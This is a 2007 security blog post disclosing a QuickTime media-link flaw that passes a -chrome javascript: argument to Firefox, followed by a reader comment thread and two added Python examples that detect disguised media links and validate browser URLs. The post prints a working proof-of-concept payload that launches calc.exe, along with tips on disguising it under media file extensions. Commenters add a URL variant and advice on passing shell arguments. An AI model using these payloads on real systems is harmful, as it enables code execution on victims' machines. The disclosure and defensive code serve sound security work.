0DAY QuickTime pwns Firefox

Wed, 12 Sep 2007 12:05:53 GMT

It seems that QuickTime media files can cause Firefox to misbehave. This vulnerability can lead to full compromise of the browser.

Before we move on, I have to say a few things. Last year I disclosed two QuickTime vulnerabilities here and here. The first vulnerability was fixed but the second one was completely ignored. I tried to bring the spotlight onto the second vulnerability one more time over here, without much success. So, I decided to post a demonstration of how a low-risk issue can be turned into a very easy to perform HIGH risk attack when the technology changes.

The exploit is rather simple. But first, here is a simple QTL file which instructs the browser to display a friendly alert('whats up...') message on the screen:

<?xml version="1.0"?>
<?quicktime type="application/x-quicktime-media-link"?>
<embed src="presentation.mov" autoplay="true" qtnext="javascript:alert('whats up...')"/>

The most interesting thing about this simple XML file is that we can save it under any extension that QuickTime supports, in order to mislead the user. If you check about:plugins in Firefox, you will see that QuickTime handles several media formats. We can use only the audio and video formats. This means that you can paste the above code into files with the extensions: 3g2, 3gp, 3gp2, 3gpp, AMR, aac, adts, aif, aifc, aiff, amc, au, avi, bwf, caf, cdda, cel, flc, fli, gsm, m15, m1a, m1s, m1v, m2a, m4a, m4b, m4p, m4v, m75, mac, mov, mp2, mp3, mp4, mpa, mpeg, mpg, mpm, mpv, mqv, pct, pic, pict, png, pnt, pntg, qcp, qt, qti, qtif, rgb, rts, rtsp, sdp, sdv, sgi, snd, ulw, vfw, wav and others.
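The disguise described above is easy to detect on the defender's side, because a real audio or video file begins with a binary container header while a QTL is plain text: an XML prolog followed by the quicktime processing instruction. The following Python scanner is an added example (not code from the original post) that sniffs the content instead of trusting the extension, flags a media link hiding behind a media file name, and classifies the qtnext value. The sample files, the extension subset and all function names are constructed for this example.

```python
import re
from typing import Optional

# Constructed sample inputs for this example (not files from the original post):
# a QuickTime media link saved under a .mp3 name, a QTL under its own extension,
# and the first bytes of a genuine MP3 (an ID3v2 tag header).
SAMPLES = {
    "qt-poc.mp3": (
        b'<?xml version="1.0"?>\n'
        b'<?quicktime type="application/x-quicktime-media-link"?>\n'
        b'<embed src="a.mp3" autoplay="true" qtnext="-chrome javascript:alert(\'test\')"/>\n'
    ),
    "playlist.qtl": (
        b'<?xml version="1.0"?>\n'
        b'<?quicktime type="application/x-quicktime-media-link"?>\n'
        b'<embed src="next.mov" autoplay="true" qtnext="http://example.com/next.mov"/>\n'
    ),
    "song.mp3": b"ID3\x03\x00\x00\x00\x00\x00\x21" + b"\x00" * 32,
}

# Subset of the extensions the post lists as handled by the QuickTime plug-in.
MEDIA_EXTENSIONS = {"3gp", "avi", "m4a", "mov", "mp3", "mp4", "mpeg", "mpg", "wav"}

QTL_PI = re.compile(rb'<\?quicktime\s+type="application/x-quicktime-media-link"\?>', re.I)
QTNEXT = re.compile(rb'\bqtnext\s*=\s*"([^"]*)"', re.I)


def is_quicktime_media_link(data: bytes) -> bool:
    """A QTL is text: an XML prolog followed by the quicktime processing instruction.
    Real audio/video starts with a binary container header, so this never matches it."""
    head = data.lstrip()[:512]
    return head.startswith(b"<?xml") and QTL_PI.search(head) is not None


def extract_qtnext(data: bytes) -> Optional[str]:
    """Return the qtnext attribute value, or None when the document has none."""
    m = QTNEXT.search(data)
    return m.group(1).decode("utf-8", "replace") if m else None


def classify_qtnext(value: Optional[str]) -> str:
    """'none', 'url', 'script' (javascript: target) or 'option' (starts with a switch)."""
    if value is None:
        return "none"
    v = value.strip()
    if v.startswith("-"):
        return "option"
    if v.lower().startswith("javascript:"):
        return "script"
    return "url"


def scan_file(name: str, data: bytes) -> dict:
    """Sniff the content instead of trusting the extension; flag a QTL hiding behind
    a media file name and any qtnext that is not a plain URL."""
    ext = name.rsplit(".", 1)[-1].lower() if "." in name else ""
    qtl = is_quicktime_media_link(data)
    qtnext = extract_qtnext(data) if qtl else None
    verdict = classify_qtnext(qtnext)
    disguised = qtl and ext in MEDIA_EXTENSIONS
    return {
        "name": name,
        "is_qtl": qtl,
        "disguised": disguised,
        "qtnext": qtnext,
        "verdict": verdict,
        "suspicious": disguised or verdict in ("script", "option"),
    }


if __name__ == "__main__":
    for name, data in SAMPLES.items():
        print(scan_file(name, data))
```

Run over a download directory, `scan_file` reports the first sample as a disguised QTL whose qtnext begins with an option switch, the plain QTL as a harmless URL, and the real MP3 as not a QTL at all. The check deliberately keys on the processing instruction rather than on the extension, since the post's whole point is that the extension is attacker-chosen.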

Enough theory, let's see some action. For more information, just read this blog post. The exploit that gains chrome privileges looks like this:

<?xml version="1.0"?>
<?quicktime type="application/x-quicktime-media-link"?>
<embed src="a.mp3" autoplay="true" qtnext="-chrome javascript:file=Components.classes['@mozilla.org/file/local;1'].createInstance(Components.interfaces.nsILocalFile);file.initWithPath('c:\\windows\\system32\\calc.exe');process=Components.classes['@mozilla.org/process/util;1'].createInstance(Components.interfaces.nsIProcess);process.init(file);process.run(true,[],0);void(0);"/>

In practice I can do anything with the browser. However, just for the sake of this demonstration, I simply open calc.exe.

If you dare to try this in your browser, here is a list of a few files you have to click on. They are not malicious. You have my word: qt-poc-01.mp3, qt-poc-02-shutdown-dont-click.mp3, qt-poc-03.mpeg, qt-poc-04.mov, qt-poc-05.avi.

BTW, QuickTime comes by default with iTunes. Therefore, iTunes users are most affected, I believe.

rezn
nice one, pdp. i am curious - did you ever formally submit this to apple security beyond posting on your blog?
tenest
wow... /me's jaw drops i thought for sure that I would be safe since I have never installed quicktime and instead use quicktime alternative (http://www.codecguide.com/download_qt.htm), but alas, these exploits work even against quicktime alternative.... very nice find...
Gareth Heyes
My question is why did you wait so long? Apple are useless, the only way to get them to do anything is to make it public. They either don't acknowledge vulnerabilities or deny there is even a problem. I suggest changing your wait time to about 1 month.
pagvac
Nice one dude. Screw overflows, who needs them when you can do things like this with JS.
Hubert
Doesn't work with Quicktime 6.5 and Firefox 2.0.0.6. The browser window just shows a broken QT icon. Is my QT too old?
Galeazzi
this is the stuff we like : ) very good job pdp
Simon Zerafa
Hi, Well this is a very good Quicktime exploit, however it works in IE7 as well as FF 2.0.0.6. Why so hard on FF? It seems to be an issue with QT, not any specific browser. Kind Regards Simon
mik
Firefox 2.0.0.6 and 3.0 are vulnerable.
Aks aka oknock
Good shot pdp. that's really good.
mwood
POPS IE
http://-chrome%20javascript:file=Components.classes['@mozilla.org/file/local;1'].createInstance(Components.interfaces.nsILocalFile);file.initWithPath('c://windows//system32//calc.exe');process=Components.classes['@mozilla.org/process/util;1'].createInstance(Components.interfaces.nsIProcess);process.init(file);process.run(true,[],0);void(0);
blah
Javascript doesn't work for me using mplayer plugin to handle quicktime. --- QuickTime Plug-in 6.0 / 7 File name: mplayerplug-in-qt.so mplayerplug-in 3.31 Video Player Plug-in for QuickTime, RealPlayer and Windows Media Player streams using MPlayer JavaScript Enabled and Using GTK2 Widgets
pdp
Simon, yes it is not Firefox specific. It works for IE as well, although the impact is less critical I must say. This is due to the tightened security policies IE implements for local zone scripts.
Tonu Samuel
I wonder if Googlebot accesses this "qt-poc-02-shutdown-dont-click.mp3" link, does it also shut google down or the bot only? lol :)
31d1
Yeah, googlebot would definitely open that in quicktime while running Firefox.
Jeff
Not one of these links actually worked on my XP machine, using Opera. This is not a bug in Quicktime, it's shitty browsers. You can't seriously suggest that a media play mechanism should decide which URLs are safe and which are not - that is 100% the problem of the browser.
Giorgio Maone
Gecko browsers + NoScript are immune, no matter if the attacker site is whitelisted or not.
Xinstict
Great work! Little note, for this to work Firefox must be the default browser.
teque
Nice disco pdp, qt-poc-02-shutdown-dont-click.mp3 link didn't work on my box until i added parameter -s to pass in 2nd to last js statement ... process.run(true,['-s'],1);void(0);
jinxpuppy
nice!
JulesLt
Tested on OS X. By default Quicktime opens the links in Safari, even if this page is opened in Firefox. You need to set the default browser to FF also. Having done so, clicking on links presents a cross-site scripting warning from FF, that the script you are running may be trying to trick you. Accepting this gives a file not found from Mozilla - possibly they have taken something down?? I really wanted to see if the native protection against installed software would kick in, or be bypassed. That said, it doesn't matter if OS X is protected, given that most Quicktime installs are on Windows XP boxes running iTunes.
Xinstict
Is it possible to run "directly" like file.initWithPath('c:\\windows\\system32\\cmd.exe /c echo x & run notepad.exe & etc')? I'm not sure if it can be done but it would be much easier to execute code without writing 'firefox backdoors' in 'chrome zone'...
bugstomper
Firefox 2.0.0.6 under MacOS 10.4.10, the links result in an alert saying You are attempting to login to site mozilla.org with username chrome%20javascript but the site does not require authentication. This may be an attempt to trick you. Is that the site you really want to visit? (I'm paraphrasing the alert warning from memory) Even if I do click Yes on that alert then Firefox tries to open a URL on http://mozilla.org, not a local file or chrome type URL or whatever you are trying to do as an exploit, and all that results is a 404 file not found. So it appears that Firefox on the Mac is not vulnerable to this after all.
dbacon
It doesn't work if you have Quicktime alternative installed.
clorox
nice pdp
Hawkuletz
Doesn't work on my Mac (Mac OS 10.4.10, Firefox 2.0.0.6 and Quicktime 7.2). So cross-platform exploits are not yet feasible.
chris
I created a file with your POC code in it, named it test.html and opened it in Windows and it didn't do anything. I put in a real mp3 file named a.mp3 and all it did was play the song, yet when I click on your links it works fine. Am I missing something?
Crolwey
The exploits do not work if you have installed the NoScript extension, even if you allow JavaScript for gnucitizen.org. The exploits do work, of course, if you allow all sites to use JavaScript, i.e. deactivate NoScript.
Bk
interestingly, when you try these exploits in Firefox on a Macbook Pro, it launches Safari, and pops up the Mozilla.org 404 page. the exploits did not work for me on an XP2 system, even after disabling noscript. but I am using a limited user account, so maybe that makes a diff?
Bk
i also tried the exploit on a Windows XP SP2 system using IE7, and it did not work. but again, I was testing using a limited user account, though I don't know if that makes any difference
dave
Well I've just tried it in a VMWare XP machine, with both firefox, IE7 and Opera clean installs. The exploit started calc.exe on all platforms. Very worrying.
Xinstict
To exploit this on IE, firefox must be installed too. IE spawns
x:\program files\mozilla firefox\firefox.exe -chrome javascript:file=Components.classes...
like all other browsers do [K-Meleon,Opera..]
Sp0oKeR
Awesome Job!!!! Actually it's easy to exploit this stuff =)!! Regards Sp0oKeR
eracc
Looks to me like this is a Microsoft Windows only problem (yet again). Firefox 2.0.0.6 with various Quicktime players on Linux does not do anything. Maybe you should try to do something that is Linux specific here. Of course the bottom line is only the truly ignorant (sadly this means many Microsoft Windows users) and morons browse the net as an administrator user.
Chitiga Georges
I've tested the exploit and it works on firefox and ie6, on ie7 i get an "error on page"
Bk
so short of uninstalling QT, what can users do to protect themselves from this particular sploit?
pdp
I would recommend installing NoScript if you are a Firefox user, and switching to Firefox with NoScript if you use any other browser. When a fix is available, restore your settings.
ntbnnt
hmmm... doesn't work on my linux or windows boxes... i tried running the tests here with the latest stable firefox and quicktime...
0ole
Same here ntbnnt. Doesn't work on Mac either.
BC
It works here, it is quite interesting. Notepad Calculator Paint...shell.
Ronald
Good find PDP, very nice research. I was aiming at the same stuff in my new BrowserFry platform, aiming to be an aid in this kind of research.
anon
tee hee... all your demo links just open up an "Enter name of file to save to" dialog box for me :-p
random
This isn't fair to us linux users. I tried to get all of your links to work but they just failed. Mplayer's plugin wouldn't let it through and then apparmor won't allow firefox to execute any applications. Any one have any suggestions? I have firefox...
Nukes
Does this exploit work in QuickTime 7.2? I have tested it here and it didn't work :(. see ya
ntbnnt
Well, I am getting to a quicktime plugin prompt, the little media bar and of course play does absolutely nothing. very strange, not quite sure what the difference is between the boxes that do it and the boxes that don't.... pdp, any ideas about what hardware/additional software would make one more vulnerable... I'll keep looking into this...
2rzn
Did not work here. My firefox runs under XP, and it's configured to automatically ask to download files like mp3, mov, avi etc. It's not allowed to automatically launch the player. Seems that that avoids the problem.
Snap
it doesn't work here, i have tried in FF and IE with the last version of QuickTime
grigs
how is it possible to pass multiple parameters to the cmd? Or does someone know where to read about the xml file.. how it is structured and what way you can write to the CMD ? thanks grigs
hnZ^
process.run(true,['/parmaeter1'],['/parameter2'],2) (2=arg length)
and use some utf8 encoder if you have long parameters. I still haven't managed to get this to write a .bat.
process.run(true,['/c > script.txt echo hello'],1)
didn't work as supposed. I also tried the javascript used by pocs for the old firelinking bug (http://www.mikx.de/firelinking/), but I didn't get that to work either.
Brandon
All these do are throw an error and then open IE, here, the lot of them. FireFox 2.0.0.6, QuickTime 7.2.
l.phoenix
I think this vulnerability could be used to install trojans and backdoors. It simply does this by attaching a binary file with javascript code, writing it to a local file and executing it. So be aware with every media link you click on in FF until Mozilla fixes it in FF 2.0.0.7!
Josh Davis
I really wished that would have worked. Apparently I need quicktime and Windows for this to work? I clicked all the links and my BSD box failed to shutdown or do anything remotely cool.
ramo
doesn't work, although a dll authenticator noted that a new connection locally initiated is attempting to connect to some unknown website. anywho, doesn't work
wilfred
no problems @ ubuntu linux :-)
joe
yay firefox 2.0.0.7 has been released! I feel safe again :)
AH
Haha, Firefox 2.0.0.7 is out that now blocks the -chrome exploit. You never see that kind of turnaround with Microsoft.
Jake Casper
This is too many critical alerts in 1 year. I see from the comments here IE isn't affected. Time to make the switch back to what works people. Jake
chaoskaizer
thanks for the news, this is one of the most hostile Firefox vulnerabilities.
danieru
wow, incredible finding, pdp! tested bug on the following: Mozilla/5.0 (Windows; U; Windows NT 6.0; es-AR; rv:1.8.1.7) Gecko/20070914 Firefox/2.0.0.7 NoScript 1.1.7.2 ...did not work, i'm on vista64. it still does recognize the script call tho, but it kinda does not find it lulz. all it says: "cannot find 'allwholecommandline'. please verify the web or local path are correct"
pdp
danieru, interesting!!!
Xinstict
here is a code.exec example since this vuln. is patched now.. This example connects to a local ftp with username x and pass x, downloads t.exe and executes it.
Chris
My 2.0.0.7 crashes opening qt-poc-02-shutdown-dont-click.mp3...
Red
LOL danieru! The firefox 2.0.0.7 that you have installed (im sure it was approx. on the 19th of september) IS issued to close the QT hole!!!! No matter if it's vista64 or not!
yksoft1
Seems Firefox 1.5.0.11 is affected but just pops a messagebox that says IE cannot find URL "Components.classes['@mozilla.org/file/local;1'].createInstance(Components.interfaces.nsILocalFile);file.initWithPath('c:\\windows\\system32\\calc.exe');process=Components.classes['@mozilla.org/process/util;1" and a blank IE Window popped out.
Thor Larholm
Firefox 2.0.0.7 takes care of this attack vector, so here are some notes about using qtnext with Internet Explorer: http://larholm.com/2007/09/19/quicktime-qtnext-0day-for-ie/
SUMGUY
What is the Remote File Download & Execute code for this Exploit..??
NonCents
This is a beautiful little hack, and used in conjunction with another - http://www.metacafe.com/watch/705792/windows_dirty_trick/ you can absolutely torture anyone... Do this to a friend to make whatever you want happen whenever they visit... any site (if you're truly evil set it to their home page)
Marcello
Windows 2000 SP4 (5.00.2195) Firefox 2.0.0.7 QuickTime player 7.1.6 Clicking on any of the supposed exploit links I obtain a new Firefox window, and the javascript error console shows something like this: Error: uncaught exception: [Exception... "Component returned failure code: 0x80004005 (NS_ERROR_FAILURE) [nsIStringBundle.GetStringFromName]" nsresult: "0x80004005 (NS_ERROR_FAILURE)" location: "JS frame :: chrome://vrs/content/vrsOverlay.js :: :: line 55" data: no]
Andreas
Firefox 2.0.0.7 has fixed this issue specifically: (excerpt from the problem report at http://www.mozilla.org/security/announce/2007/mfsa2007-28.html) "On his blog Petko D. Petkov reported that QuickTime Media-Link files contain a qtnext attribute that could be used on Windows systems to launch the default browser with arbitrary command-line options. When the default browser is Firefox 2.0.0.6 or earlier use of the -chrome option allowed a remote attacker to run script commands with the full privileges of the user. This could be used to install malware, steal local data, or otherwise corrupt the victim's computer." [...] "To protect Firefox users from this problem we have now eliminated the ability to run arbitrary script from the command-line. Other command-line options remain, however, and QuickTime Media-link files could still be used to annoy users with popup windows and dialogs until this issue is fixed in QuickTime. This QuickTime issue appears to be the one described by CVE-2006-4965 but the fix Apple applied in QuickTime 7.1.5 does not prevent this version of the problem."
Ano20070922
Notes to several other comment posters: 1. This exploit only works if Firefox is the default browser. It doesn't matter what browser you use, only the default browser matters for this one. 2. The example exploits on this page use the security hole to launch some programs that are part of Windows. To test the exploits on Mac, Linux, BSD etc. you would need to change those strings in the exploits to name programs from those systems. 3. Firefox 2.0.0.7 removed the command line option used by these exploits. 4. The real issue is that when QuickTime sees a URL inside a movie or song, it passes the url text to the command line of whatever is the default browser in a way which allows passing arbitrary text to the browser command line. In the old Firefox 2.0.0.6 browser this allowed access to the -chrome option. But any browser whose command line parser can be tricked into doing dangerous stuff from nonsense URLs can be exploited. 5. Firefox 2.0.0.7 is just a stopgap workaround for the specific exploits on this page. The real issue is that the generic "open default browser" action in the operating system and class libraries needs to ensure that whatever is passed on to the browser process is a single argument which does not look like an option or contain spaces or shell metacharacters. I don't have the Quicktime source code, so I don't know which interface they use to pass the qtnext string to the browser. But I am certain that the strings found in the exploits should not have made it through the kind of basic security sanitation filters recommended in GNU/UNIX secure programming tutorials for decades.
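The sanitation rule stated in point 5 of the comment above (hand the browser exactly one argument, and never one that looks like an option or carries spaces or shell metacharacters) can be written down concretely. The Python below is an added illustration for this page, not QuickTime's or Mozilla's code: it validates a URL before it becomes an argv element, builds the argument list without a shell, and shows why the post's own qtnext value and the comment-thread variants are rejected. The function names, the browser_path parameter and the sample strings are assumptions made for the example.

```python
import re
import subprocess
from urllib.parse import urlsplit

# Policy for a value that is about to become one argument of the default browser's
# command line: only web URLs, never anything that parses as an option switch.
ALLOWED_SCHEMES = {"http", "https"}
HOSTNAME = re.compile(r"[A-Za-z0-9.-]+")


class UnsafeUrl(ValueError):
    """Raised when a value must not be handed to the browser."""


def validate_handoff_url(url: str) -> str:
    """Return url unchanged if it is safe as a single argv element; raise UnsafeUrl otherwise."""
    if not url:
        raise UnsafeUrl("empty value")
    # A leading switch character is read as a command-line option (the -chrome case).
    if url[0] in "-/":
        raise UnsafeUrl("looks like a command-line option")
    # Raw whitespace, quotes and control characters do not belong in a URL; they are
    # exactly what a space-separated command line or a shell would split on.
    if any(ord(c) < 0x21 or c in "\"'" for c in url):
        raise UnsafeUrl("whitespace, quotes or control characters")
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        raise UnsafeUrl(f"scheme {parts.scheme!r} not allowed")
    # Reject the http://-chrome%20javascript:... style seen in the comments: the
    # "host" part is not a hostname at all.
    if not parts.hostname or not HOSTNAME.fullmatch(parts.hostname):
        raise UnsafeUrl("missing or malformed host")
    try:
        parts.port  # raises ValueError when the port is not numeric
    except ValueError:
        raise UnsafeUrl("malformed port") from None
    return url


def is_safe(url: str) -> bool:
    """Boolean wrapper around validate_handoff_url for callers that only need a verdict."""
    try:
        validate_handoff_url(url)
        return True
    except UnsafeUrl:
        return False


def browser_argv(browser_path: str, url: str) -> list:
    """argv as a list with one element per argument: the URL is never joined into a string."""
    return [browser_path, validate_handoff_url(url)]


def open_in_browser(browser_path: str, url: str) -> subprocess.Popen:
    # shell=False (the default) means no word splitting and no shell metacharacter handling;
    # the validated URL reaches the browser as a single argument.
    return subprocess.Popen(browser_argv(browser_path, url))


# Constructed inputs for this example: the first is the shape of qtnext value the post
# shows, the others are variants mentioned in the comments; none of them should pass.
REJECTED = [
    "-chrome javascript:alert('test')",
    "javascript:alert('test')",
    "http://-chrome%20javascript:x",
]
ACCEPTED = "http://example.com/next.mov"

if __name__ == "__main__":
    for candidate in REJECTED + [ACCEPTED]:
        print(f"{candidate!r}: {'ok' if is_safe(candidate) else 'rejected'}")
```

The two halves matter independently: validation stops a value that is an option switch or a non-web scheme, and passing a list to `subprocess.Popen` without a shell stops a value with embedded spaces from being split into several arguments even if validation were weaker. Browser handling of an explicit `--` terminator varies, so this example does not rely on one.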
trustme
Well. As of Sept 14th Symantec has this included in their AV defs as Bloodhound.Exploit.161 Nice work on the exploit.
je
This was fixed with the release of version 2.0.0.7, though.
Oldboy
Real through this vulnerability to load exe through the URL?
Francoise MAHENC
What do I do now? One week ago, I got a Trojan, my Word documents were erratic, the Firewall antivirus detected nothing..MS were of no help beyond checking that my software was legal. I first got a paid Plus version of my AdAware, which promptly got erratic too, but detected and deleted a MRU. After I had tried to watch a YouTube [professional] video, I had noticed a QT icon come out of nowhere [my son installed iTunes on my laptop, which I never use - and Yes, I browse as an administrator, not knowing any better]. After AdAware, I also switched to Firefox, feeling fed-up with MS generally, and from checking on NoScript, I now got on your QT bug page - it tallies. WHAT DO I DO NOW? I guess this is of no interest to you [except as further proof of Windows users being morons!] but please direct me to people who can answer me: you are the only source of clear information I could get till now. Sorry to bother you, thank you for your activity - and thank you in advance if you can direct me. Francoise Mahenc
Assyren
I'm using Windows XP sp2 IE but it's not working, the song 1.mp3 is running but the calc.exe is not working. i use this code, what should i change so it will work ? thanx
pissedoff?
your beyonce is not malicious? what about this received by AV?: Threat: Bloodhound.Exploit.161
tapasman
sweet so none of these execute on my system, *shaking fist ala Homer* unless you have something hidden. thanks for the info and sorry you did not get credit for it. I know how you feel, I have discovered close to 10 new unknown viruses and hacks and got no credit, oh well at least my co-workers know.
tapasman
oops IE 6 and QT 6.0
sachinKT
i don't know but some hacks are not working...
radioxid
The alert doesn't work anymore on FF 20013...